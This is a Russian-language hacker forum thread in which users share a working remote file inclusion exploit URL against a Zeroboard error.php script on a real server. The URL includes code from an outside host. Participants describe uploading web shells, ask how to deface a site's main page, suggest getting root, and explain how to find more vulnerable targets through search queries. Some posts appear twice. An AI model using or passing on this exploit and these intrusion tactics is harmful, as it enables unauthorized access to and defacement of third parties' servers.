желающие заюзать дырку:
______________________________
Читать здесь:
http://www.securitylab.ru/51565.html
______________________________
Пример здесь:
http://211.172.232.86/~sdtech/zeroboard/skin/zero_vote/error.php?dir=http://rredial.narod.ru/
______________________________
видео сделаю завтра, если никто раньше не сделает ;)

Показывает права на запись - это типа значит что туда можно залить шел?

В данную директории нет прав (и не показывает), а вот в другую, конечно можно ~sdtech/zeroboard/data/ называется...

В данную директории нет прав (и не показывает), а вот в другую, конечно можно ~sdtech/zeroboard/data/ называется...
А они ее уже переименовали ;)
Но это мне естессно не помешало шелл залить. Вот только 4то дальше делать. Папка борды только для 4тения и Remview пишет (ONLY READ ACCESS). Подскажите, как мейн в таком слу4ае поменять(я имею ввиду никак ли я не могу chmod 777 сам выставить)!

Я не пойму, что ты хочешь делать то? Если менять права файлов, то смотри, кто владелец и смотри кто ты, так и делай выводы. А если у чужих файлов и дерикторий, то у тебя прав нет ищи уязвимость и получай рута (на античате были эти материалы о повышении прав). А именно этот сервак я в пример привел, там даже не ковырялся. Набери в гугле Copyright 1999-2001 Zeroboard и вперед - там на каждой странице дырявых вкриптов по пять штук. К стати видео я отправил администратору, тока плохенького качества, но достпно :)).

Я не пойму, что ты хочешь делать то? Если менять права файлов, то смотри, кто владелец и смотри кто ты, так и делай выводы. А если у чужих файлов и дерикторий, то у тебя прав нет ищи уязвимость и получай рута (на античате были эти материалы о повышении прав). А именно этот сервак я в пример привел, там даже не ковырялся. Набери в гугле Copyright 1999-2001 Zeroboard и вперед - там на каждой странице дырявых вкриптов по пять штук. К стати видео я отправил администратору, тока плохенького качества, но достпно :)).

Я просто хотел дефейснуть мейн, но прав естсено нет (хотя само обидное, 4то шелл залит) :( Надеюсь ты в видео как-то выкрутился и дефейс сделал...

ВИДЕО - НАРОДУ!!! =)

Я там на другой сервак заливал, там по мойму все расшарено было..., не помню..., а дефейсить не стал, зачем - сам факт заливки работоспособности программы - уже результат. Я ж не злой хацкер :))

Я там на другой сервак заливал, там по мойму все расшарено было..., не помню..., а дефейсить не стал, зачем - сам факт заливки работоспособности программы - уже результат. Я ж не злой хацкер :))

Да не, я тоже не зверь :) Я только мейн на свой меняю и сразу старый обратно заливаю :)